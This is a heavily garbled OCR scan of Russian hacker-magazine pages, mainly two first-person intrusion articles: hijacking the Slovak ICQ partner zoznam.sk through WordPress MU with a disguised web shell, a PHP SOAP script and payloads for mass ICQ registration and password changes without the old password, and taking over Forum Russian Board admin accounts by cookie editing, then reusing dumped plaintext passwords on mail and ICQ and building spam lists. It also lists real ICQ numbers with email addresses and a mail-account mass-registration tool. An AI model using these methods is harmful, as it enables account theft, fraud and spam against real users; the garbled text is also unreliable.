Сервис от тасІпеСпатеа 



еСс-оІС 
-10:56 
зді 4 КВ 



4 КВ 



ВігесСогу 



11 Аид , 2 0 07 г . 



ВігесСогу 



10 Аид, 2007 г. -21:36 



еВс.ІзС 275 К Впкпоѵ7П 11 Аид, 2007 г. — 11:15 



Каталог с незамысловатым названием «зрі» хранил в себе много 
вкусностей: 



2 9 МВ Впкпоѵлт 10 Аид, 2 0 07 г. 



тузді . Сдз 

- 21:35 

зді -тапуііпез . кд 2 3 МВ Впкпоѵлт 10 Аид, 2 0 07 г. 

- 11:38 

зді -опеііпе . кдз 22 МВ Впкпоітп 10 Аид, 2007 г. 

- 11:27 



расЗеЬезі . 1ѵ . гсЗг 
18 Маг, 2008 г. -21:05 
раѵе . ги 

25 Вес , 2007 г. -21:54 
розкпике . ги 

2007 г . -14:58 
ЗОІІСІПО . ги 

2008 г. -12:13 
зозеСі . ЗОІІСІПО . ги 
2008 г. -12:52 
кгаѵеі . зоІісіпо . ги 

13 Арг , 2008 г. -12:52 
иа . епегдодісі . ги 
11 Виі , 2007 г. -17:33 
ѵіпо . ЗОІІСІПО . ги 
13 Арг, 2008 г. -12:52 
ѵіпоресііа . ЗОІІСІПО . ги 4 КВ 

2007 г. -13:02 
ѴОІ1 . ЗОІІСІПО . ги 

2 3 Вап, 2008 г. -23:37 
епегдодісі_о1сі_агс]тіѵе . кдг 

2008 г. - 15:46 





Рі-Н^Ті* 



4 КВ Вігескогу 

4 КВ Вігескогу 



4 КВ 


Вігескогу 


22 Вес, 


4 КВ 


Вігескогу 


0 5 Аид, 


4 КВ 


Вігескогу 


13 Арг, 



4 КВ Вігескогу 



4 КВ Вігескогу 

4 КВ Вігескогу 



Вігескогу 



2 5 Вес , 



4 КВ Вігескогу 



7 8 МВ Впкпоѵ^п 21 Виі , 



К сожалению, слить найденные бэкапы не удавалось. Важный 
модуль попросту отказывался показывать их содержимое — то ли 
по причине отсутствия прав, то ли в результате ошибки выполнения 
самого модуля. Удача в этот раз явно обошла меня стороной, однако 
сдаваться в мои планы не входило, и я принялся осматривать веб- 
каталог сервера — /орк/ѵ^ѵ^ѵ^: 



Можно было попробовать залогиниться в админку какого-нибудь из 
сайтов, использовав аккаунты от Му501. Потратив на попытки более 
часа, я оставил эту затею и принялся окучивать РТР, что тоже не 
принесло результатов. Я вынужден был отдать должное админам и 
отступить... В этот раз довести начатое до конца не удалось. Почему? 
Об этом читай ниже. 



2 Оіек . ЗОІІСІПО . ги 
12 РеЬ, 2007 г. -10:04 



4 КВ 



епегдодісі . ги 
2008 г. -16:32 
кііез . розкпике . ги 4 КВ 

2005 г. -20:50 
кюЬЬу . ЗОІІСІПО . ги 
13 Арг, 2008 г. -12:52 
расіеЬезі.Іѵ 4 КВ 

2008 г. -10:46 



4 КВ Вігескогу 
Вігескогу 21 Виі , 

Вігескогу 31 Оск , 

4 КВ Вігескогу 
Вігескогу 13 Арг, 



Н ЧТО ПОМОГЛО АДМИНАМ 

С точки зрения безопасности, огромным плюсом оказалось ограни- 
чение в правах и в возможности удаленного подключения пользова- 
телей Му501. Все найденные аккаунты мне попросту не понадоби- 
лись. Стоит отметить, что везде использовались разные и сложные 
пароли. Именно поэтому так и не удалось за юзать пароли от мускула 
«в иных целях». Нон ал и цо был и ряд ошибок: начиная от исполь- 
зования бажного модуля и заканчивая кривым разграничением 
прав пользователей на сервере (благодаря чему я шарил по всем 
необходимым каталогам). В любой бочке меда можно найти ложку 
дегтя — или наоборот :]. 
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МАГ 

/ ІСО 884888 / 



Помнишь прошлогодний взлом украинского 



Іс 



локализованного 



па 



тне 



Сот — Віетіг.Меі:? Теперь настала оче 
ла — 2о2пат.8к! Истооия повтогяется! 



в поиски ПАРТНЕРА 

Как-то раз мне пришла идея проверить всех локализованных партне- 
ровтети Аси на наличие распространенных пабликдвижков. Поиски 
увенчалисьуспехом на словацком портале 2о2пат.5к . а, если точнее, 

— по адресу Ыод.гогпат.зк . Радости не было предела, когда, открыв 
Ы:пп [-исходи и к страницы, я увидел чарующую надпись: 

<те[:а пате= "депегаСог " соп[:еп[:= "ІДогсіРгезз ѵ^огсіргезз-ти- 
1.2.5" /> 

Хотя паблик эксплойтов под эту мультипользовательскую версию 
Вордпресса на тот момент не существовало (ѴѴогсіргезз МІ) < 1 .3.2 ас1іѵе_ 
ріидіпз орііоп Сосіе Ехесиііоп Ехріоіі, находящийся по адресу тіІУѵОгт. 
сот/ехр1о1[5/5066 . появился гораздо позже), у меня уже были кое-какие 
догадки по поводу возможности включения произвольных плагинов в 
МП-версию Вордпресса. В прошлогодних номерах я, кстати, описывал 
похожий способ — если что, поднимай подшивку. 

Недолго думая, я принялся за взлом. 



находится в уууууу/Ыод.2О2пат.5к/уур-соп[еп[/Ыод5.б1г/680/[|[е5/2008/01/ 
тууѵеЬ5Ьеи.] рд. 

Теперьтребовалось наваять простенький б[пп[-эксплойтдля включения 
шелла в активные плагины. Для этого я зашел на страничку б[[р:// 
Ы]аскеб.Ыод.202пат.5к/\л/р-абппіп/ор[іоп5-депега1.рЬр. сохранил ее 
ксебе на винти открыл втекстовом редакторе. Изменить нужно было 
следующие поля: 

<1огт те[:]то(і= "розС " асЦіоп="ор[:іопз .р1ір"> на <1огт 
те[:]то(і= "розС " асЦіоп= "ІіРЦр : / /М^ аскесі. Ыод . зозпат. зк/ 
ѵѵр-асітіп/орСіопз .ркр " > 

<іприк пате= "Ыодпате " Цуре= " кехС " ісі= "Ыодпате» 
ѵа1ие= " ѵазуа» зІ2е="40" тах1епд[:1і= " 2 О " /> на <іпри1: 
пате= " аскіѵе_р1идіпз " /> 

<іпри[: пате= "Ыодсіезсгіркіоп» Суре= " кехк " 

ісі= "Ыодсіезсгіркіоп" зку1е= : 95%" /> на <іпри[: 

пате= "сіЬ_ѵегзіоп" /> 

<іпри[: Цуре= "кісісіеп" пате= "раде_ор[:іопз " ѵа1ие="Ы 



Н ПРОТРОЯНИВАНИЕМи 

Пройдя по адресу к пат.зк/уѵр-зідпир.рбр . я заполнил 

необходимые поля и создал блоге новым именем Ь[[р://Ы]аскеб.Ыод. 
202пат.5к. 

Послетого, какна мыло мне прилетел парольотвновьсозданного блога, 
я зашел в админку по адресу Ь[[р://Ы]аскеб.Ыод.202пат.5к/\л/р-абппіп. 

В окне создания нового поста я загрузил свой веб-шелл, замаскиро- 
ванный под картинку (это было нетрудно, так как вордпресс вообще не 
проверяетсодержимое загружаемого файла, а лишь смотритего расши- 
рение]. Необходимо было найти полный ра[б до моего шелла. Сделать 
это было также нетрудно. Мне сильно помогла утилита экспорта содер- 
жимого блога, расположенная по адресу Ь[[р://Ы]аскес1.Ыод.202папп. 
5к/уѵр-асІппіп/ехрог[.оЬр?сІоуѵп[оаб. Она показала, что мой веб-шелл 



одпате , ЫодсіезсгірСіоп, пеѵ7_асітіп_етаі1 , изегз_сап_ 
гедізкег , дт[:_о11зе[: , сіа[:е_1огта[: , кіте_1огта[: , зСаг[:_ 
о1_ѵ^еек, согптеп[:_гедіз[:га[:іоп,Ѵ\[РЬАКС, Іапдиаде" /> на 
<іприк Цуре= "кісісіеп" пате= "раде_оркіопз " ѵа1ие= " аскіѵе_ 
ріидіпз , сіЬ_ѵегзіоп" /> 

Открыв страничку у себя в браузере, я прописал значения в полях ввода: 

. . /Ыодз . (ііг/б80/іі1ез/2008/01/туѵ^еЬз]те11 . зрд в аскіѵе_ 
ріидіпз 

и 1 в сіЬ_ѵегзіоп 

Цифра «1 » в поле с версией базы данных нужна для правильного вклю- 
чения плагинов. Старые версии вордпресса хранят адреса включенных 
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ІМой веб-шелл в корне Ыод.202пат.5кі 



'Асечный веб-реггер' 



плагинов в БД в виде списка, а новые — в виде сериализо- 
ванного массива. При изменении версии БД на более ста- 
рую Вордпресс автоматически перебрасывает на страницу 
ирдгабе.рЬр, где текстовые списки плагинов конвертируют- 
ся в сериализованный массив. 

Н НА СЕРВЕРЕ ЗОЗНАМА 

После отсылки нужных данных из моей ядовитой формы, 
а также апгрейда блога, — яувидел свой новоиспечен- 
ный шелл по адресу бир://бііаскес1.рІоа.207пат.5к/іпсІех. 
рЬр?[о1ед. И почему-то мне не показался необычным тот 
факт, что все директории и файлы на сервере словацкого 
партнера аси оказались открыты на запись :). 

Вариантов, чтоделатьдальше, было много. Можно слить себе 
всю базуданныхасекЗознама (но я знал, что ценных шестизна- 
ковтам нет], а можно, поаналогиисбигмиром, написать реггер 
асек— и просто сидеть«рыбачить» красивые номера. Выбрав 
второй варианти опираясьна скриптыдля доступа к I СО ІР5АРІ, 
сохранившиесясбигмира,я и принялся за реггерасек. 

Н РЕГГЕРр РЕГГЕР 

Я решил изучить возможные нововведения в интерфейсе 
ІР5 и составил простенький рбр-скрипт: 

<? 

$зіСе= ' ірз . ісд. сот' ; 

$раЦІі= ' /іср.рІірРѵ^зсіІ ' ; 

$(іаРа= ' ' ; 

$оиР = "РОЗТ $раРІі НТТР/1 . 1\г\п" ; 

$оиР .= "НозР: $зіРе\г\п"; 

$оиР .= "СопСепР-Цуре : РехР/хт1\г\п" ; 

$оиР .= "СоппесРіоп: СІозе\г\п"; 

$оиР .= ' СопРепР-ЬепдРІі : ' . зРгІеп ( $сіаРа) . 

" \г\п" ; 

$оиР .= "ЗОАРАсРіоп: ІіРРрз : //ірз . іср. сот/іср. 
р]тр\г\п" ; 

$оиР .= "изег-АдепР: Орега\г\п"; 

$оиР .= "Кеіегег: ІіРРр : / /ісд . зозпат. зк\г\п" ; 
$оиР .= "Соокіе: 1\г\п\г\п"; 
іѵ^гіРе($ір, $оиР . $(іаРа) ; 

$з1іпуада= ' ' ; 
ѵ7Ііі1е ( ! іеоі ( $ір) ) 

{ 

$з1іпуада . =ігеасі ( $ір , 4800); 

} 

ісіозе ( $ір) ; 
ргіпР $з1іпуада; 

?> 

Самое интересное, что я вынес из ответа сервера, было 
обязательноеуказание ІР-адреса при регистрации нового 




Смена паролей на аськах, привязанных кзознам]^ 

СИМ. Но вся соль в том, что ІР-адрес при отправке пакета 
реги можно было указать любой (хоть 127.0.0.1 , хоть 1 .1 .1 .1]. 
Для проверки я написал простейший веб-реггер, который 
отправлял в цикле на сервер аси следующий пакет данных 
50АР: 

<?хт1 ѵегзіоп= " 1 . о " епсосііпд= "ІІТР-8 " 
зРап(іа1опе= "по " ?> 

<ЗОАР-ЕМѴ : Епѵеіоре хтіпз : ЗОАР-ЕМѴ= "кРРр : / / 
зскетаз .хтізоар . огд/зоар/епѵеіоре/ " хтіпз : 
Ѵ7зсі1= "кРРр : //зскетаз .хтізоар . огд/ѵ\;з(11/ " 
хтіпз : зоар= "кРРр : //зскетаз .хтізоар . огд/ѵ73(11/ 
зоар/ " хтіпз : Рпз= "игп : ІССЗегѵег " 
хтіпз :хз(1= "кРРр : / . огд/2001/ХМЬЗскета" 




> Ііпкз 

* іир://202Пат.5к — 
виновникторжества. 

* бІІрѴ/ппи.ѵѵогбргегз. 
огд — официальный 
сайтѴѴогбргезз МС. 
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V іиоярѵ ІДіч-.ріѵрэд 4і’ 



ІКчІмкыіаі.4-і 



дминка моего блога на Зознамеі- 
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>• 
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хтіпз : ЗОАР-ЕЫС= "ЫіДр : //зсііетаз . 
хтізоар . огд/зоар/епсосііпд/ " хтіпз : 
хзі= "ІіДЕр : / /шт.ѵ^З . огд/2 0 01/ 
ХМЬЗсііета-іпзДапсе" > 

<30АР-ЕЕѴ:Во(Іу> 

<тпз : ісдКедізЕег хтіпз : 
тпз= "игп: ІССЗегѵег " ЗОАР-ЕЕѴ: 
епсо(ііпдЗЕу1е= "ІіЕЕр : / /зсііетаз . 
хтізоар . огд/зоар/епсо(1іпд/ " > 
<рагатз хзі : Еуре= " Епз : КедізЕгаРіопОЬз есЕ " > 
<раззѵ70гсі хзі : Еуре= "хзсі: зЕгіпд " >ПАРОЛЬ</ 




> ѵѵагпіпд 

Информация предо- 
ставляется исклю- 
чительно кознаком- 
лению и размышле- 
нию. Никакая часть 
этой статьи не может 
быть использована 
во вред. В обратном 
случае ни автор, ни 
редакция не несут 
ответственности 
за возможный 
ущерб, причиненный 
материалами данной 
статьи. 




> сіѵсі 

На нашем диске мы 
выложили ЮОкзаре- 
гистрированных на 
зознаме номеров 
с паролями в придачу. 
Перед тем, какты их 
будешь использовать 
в каких-либо целях, 
спешим напомнить, 
что спам незаконен! 



раззѵ70гсі> 

<етаі1 хзі : Еуре= "хзй: зЕгіпд" >МЫЛО</етаі1> 
<піск хзі : Еуре= "хзсі : зЕгіпд" >< ! [СВАТА [НИК] ] > 
</піск> 

<ір хзі : Еуре="хз(і: зЕгіпд">РАНД0МНЫЙ_ІР</ір> 
<і(Л хзі : Еуре="хзсі: зЕгіпд " >РАНДОМНОЕ_ЧИСЛО 
</ісі> 

</рагатз> 

</тпз : ісдКедізЕег> 

< / ЗОАР-ЕЕѴ : ВосІу> 

< / ЗОАР-ЕЕѴ : Епѵе1оре> 

Сам веб-реггерты можешьувидеть на скриншоте. 

Но на этом, конечно, нельзя было останавливаться. Как 
и в случае сбигмиром, один добрый человек написал 
многопоточный бСІ-реггер на Делфях. Я оставил к нему 
свой гейт на серверезознама (его ты также сможешь 
увидеть на скриншоте). Добавлю лишь, что скорость 
регистрации новых 9-знаков составляла 1 2 ррз. В итоге 
мы нарегали около полумиллиона свежих асечных 
ІЛ М’ов, среди которых частенько попадались слоники и 
ХУ-номера. 

Н ПАРОЛЬ НЕ НУЖЕН 

Я решил не останавливаться на одной только регистрации 
номеров и еще немного исследоватьасечные 50АР-ин- 
терфейсы. Пробежавшись взглядом по ІР5, я вспомнил, 
что локализованным партнерам можно менять пароли на 
номерах, привязанных к ним, зная только мыло и ІЛМ, без 
знания своего пароля (так как доступа к основной базе дан- 
ных Зознама у меня все равно не было, это могло оказаться 
очень полезным). 50АР-запись, отвечавшая за эту нехитрую 
операцию, выглядела воттак: 

<сотр1ехТуре пате= " СкапдеРаззОЬ^ есЕ " > 

<а11> 

<е1етепЕ пате= "раззѵ^огсі" Еуре= "хзсі: зЕгіпд" /> 



<е1етепЕ пате="иіп" Еуре= "хзсі: зЕгіпд" /> 
<е1етепЕ пате= " ір " Еуре= "хзсі: зЕгіпд" /> 
<е1етепЕ пате= " етаіі " Еуре= "хзсі: зЕгіпд" /> 
<е1етепЕ пате="пеѵфазз" Еуре= "хзсі: зЕгіпд" /> 
<е1етепЕ пате= " ісі" Еуре= "хзсі: зЕгіпд" /> 

</а11> 

</сотр1ехТуре> 

Взяв за основу тот факт, что <е1етепЕ пате= "раззѵ^огсі" 
Еуре="хзсі: зЕгіпд" /> является необязательным 
элементом при составлении запроса на смену пароля к 
привязанному номеру, я в очередной раз задействовал 
все свои кодерские способности. И написал новый скрипт, 
который отправлял пакет на смену пароля к номеру и имел 
следующие пол я (внешний вид скрипта ты сможешь снова 
увидеть на скриншоте): 



<Еогт теЕЕюсі= " РОЗТ» асЕіоп= " ? " > 
иіЫ<Ьг/> 

<іприЕ пате="иіп" ѵа1ие= " " /><Ьг/> 
мыло от него<Ьг/> 

<іприЕ пате="етаі1" ѵа1ие= " " /><Ьг/> 
новый пасс<Ьг/> 

<іприЕ пате= "пеѵтразз» ѵа1ие=" "/><Ьг/> 

<іприЕ Еуре= " зиЬтіЕ " ѵа1ие= "Сменить пас- 
сворд ! " /> 

</Еогт> 

Оставалось найти несколько нумов, привязанных кЗознаму. 
Что я успешно и сделал, заюзав поискна форуме асечного 
портала азесЬка.ги . Подопытными номерами стали: 

100796 ; (іітка4и@202пат. зк 

127744 ;До 2 еЕ. КаЕЕкаОгогпат. зк 

2 5002 0 ; ЕурекЕегпапсіоОгогпат. зк 

2727 68 ; р0ѵаг@2О2пат. зк 

344365; е1ігап82@202пат. зк 

404196 ;Міс1іае1а .Ми11егоѵа@202пат. зк 

422222 ; 422222@202пат. зк 

481008 ;тігес123 4 @ 202 пат. зк 

5062 08 ; Е . ЕШКдЕ@ 202 пат. зк 

555885 ; ко27пт90рсх@2О2пат. зк 

661117 ; Іт 1 @ 2 таі 1 . зк 

Это были единственные 6-знаки, хранившиеся в базе 
данных202пат.5к. Применив кним свой нехитрый скрипт, я 
убедился, что старый пароль действительно не нужно указы- 
вать. Паролиуспешносменились. Нотаккакя оченьдобрый 
человек, я решил отдать все номера обратно их владельцам. 

Н УДАЧНОГО ОБЩЕНИЯ ВАСЕ 

И вновь адским образом взломан очередной локализован- 
ный партнертети Аси! Каки прежде — благодаря моему 
любимому Вордпрессу. Былозарегано много новых9-знаков 
для спама и прочих целей. Удалось пошатнутьавторитет не 
только крупнейшего интернет-портала, но и самой Ісд.сопп . 
которая при регистрации новых номеров до сих пор немного 
подтормаживает. 

Ни одна из упомянутых в статье уязвимостей не закрыта до 
сих пор (правда, блоги на Зознаме я обезопасил от последу- 
ющих взломов описанным способом). 

По околоасеч ному ми РУ ходит непроверенная информация о 
взломе чешского партнера аськи Ьйр://а1:[а5.с2. Поэтомѵсо- 
ветую никогда не использовать локализованных партнеров 
и их привязки, а юзать только проверенный временем (хотя и 
тоже несколько раз взломанный) ісд.сопп . ^ 
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С0К5А0РС 






/ШУ\ІР\НЕ. 



представляет оп-Ііпе игру 





Многочисленные призы 
от АІріпе 



Махі Касіпд - это виртуальный мир гонок на твоем компьютере! 

Хочешь обладать самым крутым гоночным автомобилем? Значит - Махі Касіпд для тебя! 

В игре у тебя есть возможность купить авто, доработать его по полной и продать дороже, 
а на вырученные деньги купить новую тачку, еідё круче. Но самое главное: побеждаешь в 
игре - побеждаешь в реальности! Каждый месяц новые призы! Ты можешь выиграть 
компоненты Саг Аисііо & МоЬіІе Месііа от АІріпе, страховку РОСНО на свое авто. 

А в конце года лучший получит реальный автомобиль - ОреІ Согза! 



МАХІ КАСІМС. ИГРАЙ И ВЫИГРЫВАЙ! 

Все подробности игры на сайте ѵѵѵѵѵѵ.тахі-гасіпд.ги и \л/\л/\л/.тахі-1;ипіпд.ги 



РОСНО 



в составе АІІіапг @ 



тш 





' Движок Рогшп КизБІ ап В оагсі (ѵѵшѵѵ^гЬ.ги) не от личается ни крас отой д изай-, 
ни (^нкц^нальностью, и уж тем более^надежност^ Он не пользуе тся 
юпулярн ^^^^^^^^, но, все же, встречается. Преткновение 




в админку такого форума — дело техники. Есть ли от этого хоть какая-то 

^4 Я 

ольза? Как выяснилось, да. 








Н КДЕЛУ! 

Для начала определимся с целью — загуглим игі-запрос: «Рогит/ 
гедізСг . рЬр». Страница регистрации на форуме сокращенно названа 
гедізіг, и могут попасться случайные форумы, не имеющие отношения к 
РКВ. Поэтому нужно или посмотреть на внешний вид форума, или исполь- 
зоватьзапрос«Роѵѵегесі Ьу Рогит Риззіап Воагсі». 

Дизайн незатейлив, а количество необходимых кзаполнению полей 
минимально. Нет даже проверки введенного пароля и защиты регистра- 
ции от бота. В качестве жертвы я выбрал тематический форум любителей 
какой-то там породы собак. 

Чтобы зарегистрироваться на форуме, совсем не обязательно указывать 
свой е-таіі. Вход осуществляется и без подтверждения регистрации, 
поэтому, если есть желание обрадовать дядюшку Билла, можно указать ка- 
кое-нибудь мыло «мелкомягких». После регистрации логинимся и идем к 
списку пользователей. Наш ник— в верхней части списка. Логика подска- 
зывает, что если новый пользователь находится в начале списка, то админ 
регился в числе первых. Значит, его ник мы можем найти в самом конце. 
Переходим на последнюю страницу пользователей и... вотон — админ. 
Записываем ники переходим к редактированию соокіе. У всех браузеров 
это делается по-разному, так что, как это осуществить, — решай сам. На- 



пример, в Опере через меню мы попадаем к списку соокіе, и перед нами 
предстаеттри значения: имя, Ю и пароль. 

Свое имя заменим ником администратора, а I В соответствует порядково- 
му номеру пользователя. Как правило, админ имеет Ю=1 (регистрируется 
на форуме самым первым). Если админ на последней странице пользова- 
телей находился в самом низу — значит, таконо и есть. Итак, Юустановим 
равным единице, а парольоставим без изменений. Закрываем редак- 
тирование соокіе и обновляем страницу. Теперь мы либо попадем на 
страницу форума под ником администратора, либо окажемся неавтори- 
зованным пользователем. Разницы, по сути нет, потому какследующим 
шагом все равно будет переход в админку. Для этого к адресу форума 
дописываем абтіп и переходим на страницуадминистратора. 

Н ІМ5ШЕ 

Мы внутри. Что дальше? Первым делом копируем БД форума, она нам 
еще пригодится. 

Тутимеетсмысл перейти к массовой рассылке сообщений пользовате- 
лям. Обычный спам можети недойти, но письмецо отадминистратора 
форума легко пройдетсквозь спам-фильтры и достигнет получателя. Если 
тебе нечего предложить или сказать, этот шаг можно пропустить. Если 
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оченьхочется потешить самолюбие, можно создать новое 
специальное звание «][акер» и присвоить своему аккаунту. 
Впрочем, это мелочи, не имеющие практической пользы. 
Вернемся ксохраненной базе данных. 

г ГЕОМЕТРИЧЕСКАЯ ПРОГРЕССИЯ 

Для обработки даже небольшой базы данных потребуется 
или много времени, или людей. Когда над полученными 
данными работает группа взломщиков, это ускоритобра- 
ботку, но обработка «в одиночку» можетзанять несколько 
часов. Единственное, что облегчает работу, — нешифрован- 
ные пароли (они находятся в чистом виде). 

Слитая база содержит много лишних данных; ценность 
представляют только данные пользователей. Они имеют 

следующий ВИД: 



# Данные таблицы 

# 



бгЬ_изегз ' 



ІЫЗЕКТ ІЫТО бгЬ_изегз ѴАШЕЗ ( ' 1 ' , 

' ДекаСегіпа ' , ' 5ЕдЫШр4 ' , ' ДекаСегіпа® 
согзосІиЬ. ги ' , ’кССр: / /ѵллм. согзосІиЬ . ги ' , 

' ' , 'Еиззіа' , ’Мозсоѵ^' , 'Президент НКП кане 
корсо ' , 'Любимые кане корсо и вообще собаки. 
Бизнес. Недвижимость. Творчество. Верховая 
езда. Плавание. Лыжи. Путешествия. Яснознание 
и эзотерика. Пиар.', '8-9031846554', 'Успехов 
и здоровья! ' , 'І.зрд', '726', 'В', '2006-02-28 
02:14:47', 'АЕЕ', '1', 'У, ' N ' ) ; 

В значениях по порядку идут Ю пользователя, логин, 
пароль, е-таіі, 0 РЕ сайта пользователя, номер ІСО, страна, 
город... Остальные данные малоинтересны. Данные можно 
обработать, прибегнув к стандартному клиенту из поставки 
МуВОЕ — или, в крайнем случае, с помощью МуВОЕ Оиегу 
Вгоѵѵзег. 

Обычно основной задачей взлома является получение при- 
были. Думаю, многие разделяютэто мнение. Такчто — можно 
выбрать пользователей, указавших ІСО при регистрации, 
отсеять шести- и семизнаки и попытаться войти в них под 
тем же паролем, какой использовался при регистрации на 
форуме. ЕІІансов немного, но, все же, это возможно. Идею 
подкреплялото, что большинство собаководов были девушки 
— они, какизвестно, более беспечно относятся кзащите ком- 
пьютера. Затем можно выбрать пользователей, указавших 
свой сайт. Здесьтакже могут подойти логин/пароль. Замечу, 
что проникнуть на сайт таким способом удается редко, а вот 



проникновение в бесплатные почтовикитипагіюіЕги — рас- 
пространенное явление. Без особого труда реально написать 
небольшую программку или позаимствовать чужую: она будет 
выдергивать пароли из базы и подставлять их к почтовому 
аккаунту. 

Если удалось проникнуть в почту пользователя, начинается 
самое интересное. Хакер просматривает последние входя- 
щие и исходящие сообщения в поисках чего-либо, заслужи- 
вающего особого внимания. После этого переходит к поиску 
писем по ключевым словам: по отправителю — Ігапзіег, 
сазіпо, осіпокіаззпікі, ѵкопіакіе: по теме или содержанию 
— Еедізіг, Регистр, топеу, е-доісі, рау. 

Пока на этом и остановимся. Список можно дополнить по 
своемуусмотрению. Смысл втом, чтобы найти письма из 
электронных систем типа ѴѴеЬМопеу интернет-казино, со- 
циальных сетей «Мой мир» ит.д. Зная о месте регистрации, 
можно без труда восстановить пароль, ведь он придет на 
электронную почту. Пользователь может иметь счет в интер- 
нет-казино, может быть активным участником форума и его 
«рекомендации» могут приниматься другими пользовате- 
лями форума на веру, — в общем, смысл понятен. Двигаясь 
по списку пользователей, можно насобирать неплохих 
трофеев из красивых ІЛМ’ов; аккаунтов кдругим форумам; 
сайтов, к которым платный доступ; к интернет-магазинам; 
наконец, кадминке сайта этого пользователя. Полученные 
данные растутв геометрической прогрессии, а какими 
распорядиться, — подскажут совесть, знания и опыт. 

Даже без всех вышеописанныхусилий у хакера на руках 
оказывается приличная тематическая е-таіібаза. Она 
засорена всяким мусором, но это не проблема. Для очистки 
отхлама всю БД сохраняют в формате ТХТ или НТМЕ, после 
чего загружают ее в АбѵапсесІ Е-таіІ Ехігасіог. В настройках 
выставляется запрет на дублирование адресов, и запуска- 
ется сканирование (авторы утилиты не бескорыстные люди, 
поэтому ищем лекарство к программе или довольствуемся 
имеющимися возможностями). После сканирования хакер 
получает чистую спам-базу, размер которой, естественно, 
зависит от масштабности форума. 

г СПИСОКТРОФЕЕВ 

Вотсписоктого, что мне удалось получить с этого фору- 
ма: два кривых семизнака и один шестизнак; аккаунты к 
четырем форумам, при этом один из нихоказался с правами 
модератора; доступ кадминке другого сайта собаководов, 
который принес еще одну базу данных. Крометого, один 
юзер «провел» меня в интернет-казино — и хотя его счетока- 
зался нулевым, в другой раз картина можетбыть иная. Ну и, 
разумеется, я получил е-таіібазу на парутысяч адресов. 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно 



для ознакомления 



Соблюдай законы! Ни 
автор, ни редакция 
за последствия твоих 
действий ответствен- 
ности не несут! 
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ПРОГРАММА: ЕѴЕ05 
ОС:*МІХ/ѴІМ 




Официальный сайтеуеОЗ 



ЕуеОЗ представляет собой кроссплатформен- 
ную сетевую ОС с открытым кодом, основан- 
ную на принципе Оезкіор Орегаііпд Зузіет 
(операционная система с применением 
решения «рабочий стол»). Базовый комплект 
утилы включает в себя саму ось и ряд офисных 
приложений: текстовый редактор, календарь, 
менеджер файлов, мессенджер, браузер, каль- 
кулятор и несколько других. ЕуеОЗ использует 
НТМЕ, РНР, А^АX и ^аѵа5сгір1: для обеспечения 
доступа к личной учетной записи. Примеча- 
тельно, что в еуеОЗ нет необходимости в уста- 
новке софта на локальный комп. Рабочий стол, 
используемые приложения и вся необходимая 
информация доступны излюбойточки мира 
(при помощи любого браузера с поддержкой 
А^АX и Масготесііа ЕІазЬ). Другими словами, 
мы имеем дело с веб-осью (написанной на РНР 
и распространяемой полицензии ОМП/ОРЕ). 
Для работы с веб-осью нужно установить 
еуеОЗ на какой-либо ПКили удаленный сервер 
(второе в нашем случае более предпочтитель- 
но). После чего — открыть учетную запись и уда- 
ленно работатьс ОС. Основное требование при 
установке — наличие на сервере АрасЬе и РНР 
=> 5.0. Из полезных приложений, включенных 
в состав ОС, назовем программу для просмотра 
графических изображений, і"1:р- и гзз-клиенты, 
медиаплеер, почтовый клиенти веб-брау- 
зер. Для убийства рабочего времени в состав 
входят несколько флэш-игр: Зопіс, Ргіпсе 
оі Регзіа, шахматы. Есть и свой ІМ-клиент, 
который, увы, не поддерживает 100-протокол. 
Офисные программы позволяютзагружать и 
редактировать тексты, таблицы и презентации 
в форматах Місгозо!"!: ОІ'бсе и ОрепОІбсе.огд. 




ЛЕОНИД «вою» СТРОЙКОВІ 

і коіо@вкТкц/^^^^Н 




Программы для хакеров 




После редактирования документлибо слива- 
ется на локальный жесткий диск, либо остается 
на сервере. Об интерфейсе опера ционки долго 
распространяться не буду, скажулишь, что он 
достаточно привлекателен и чем-то напомина- 
ет О поте для и п их. Локализован интерфейс не 
полностью, однако есть частичная поддержка 
кириллицы. В общем, если тебе нужна надеж- 
ная, защищенная, удаленная веб-ось — оста- 
нови свой выбор на еуеОЗ, не пожалеешь. 

ПРОГРАММА: ХАКЕР.РУ РЕССЕР 
ОС:*МІХ/ѴІМ 
АВТОР: 5НА^0V_Р1РАТ 







Автоматический регер мыльников 

Идея написания универсального регера мыль- 
ни ковненова. В одном из прошлых выпусков ][ 
я знакомил тебя со скриптом от ОХ, предназна- 
ченным для быстрого «коллекционирования» 
мыл на таіі.гц . Асегодня хочу представить еще 
одну полезную тулзу— полуавтоматический ре- 
гер мыл «хакег.ги», написанный на РНР. Скрипт 
автоматически заполняет все необходимые 
данные (рандомно), оттебя требуется только 
ввести капчу :). Регер имеет минимум настроек 
и максимально прост в использовании. Скрипт 
умеет регать мыльники в зонах: 



хакег.ги, ераде.ги, етаіі.зи, 
зкисіепЦ.зи, 1іи2.ги, таі12к.ги, 
Легідпег . ги, ргодгатізС . ги 
опіутаіі.ги, Іодтаіі.ги 



К сожалению, скрипт не поддерживает 
работучерез прокси, но, пока майл-сервис 
неввелбанпоІР, можно жить спокойно. Из 



требований к работе регера важны: 

1. Хост с поддержкой РНР; 

2. Работа бзоскореп. 

Установка скрипта не вызовет никаких затруд- 
нений. Необходимо ЛИШЬ: 

1. Залитьскриптна сервер; 

2. Создать файл пехктаіі.кхк и выставить 
на него сктой 777. 

Открываем в браузере скрипт и дописываем у 
и гі’у значение «?сіо=гед». Например: 
кккр : / /зіке . сот/пехктаіі . р1тр?с1о=гед 
Затем вводим капчу и ждем. Если выводится 
сообщение «Зарегано», значит— мыльник 
зарегался. В случае показа пустой страницы 
— неверно введена капча. Послетого, как 
увидишь надпись«Зарегано», жми в браузере 
«Назад» и «Обновить» и приступай к вводу 
новой капчи. 

Р.5. В комплекте к регеру прилагаем еще один, 
оттого же автора, но уже под Роскка . ги. 
Скрипт имеет схожие конструктивные особен- 
ности и регаетмыльники в зонах: 



роскка.ги, Ргоппги . сот, Ргопк.ги, 
коСЬох.ги, коСтаіІ.ги, кгоѵаСка . зи , 
Іапсі.ги, таіІІБ.сот, таіІЗЗЗ.сот, 
пеѵлтіаіі . ги , підкСтаіІ . ги , пт.ги, 
рі зет. пек, росккатк . ги , рорЗ.ги, 
гЬстаіІ.ги, зткр . ги 



Послетого, какзальешь скрипт на хост, создай 
два файла: сопкід.кхки доосѣпаіі . кхк с 
сЬтоб’ом 777. Использовать регер следуеттак 
же, каки предыдущий. Так что, если утебя поя- 
вились вопросы — перечитай описаниетулзы с 
самого начала :). 

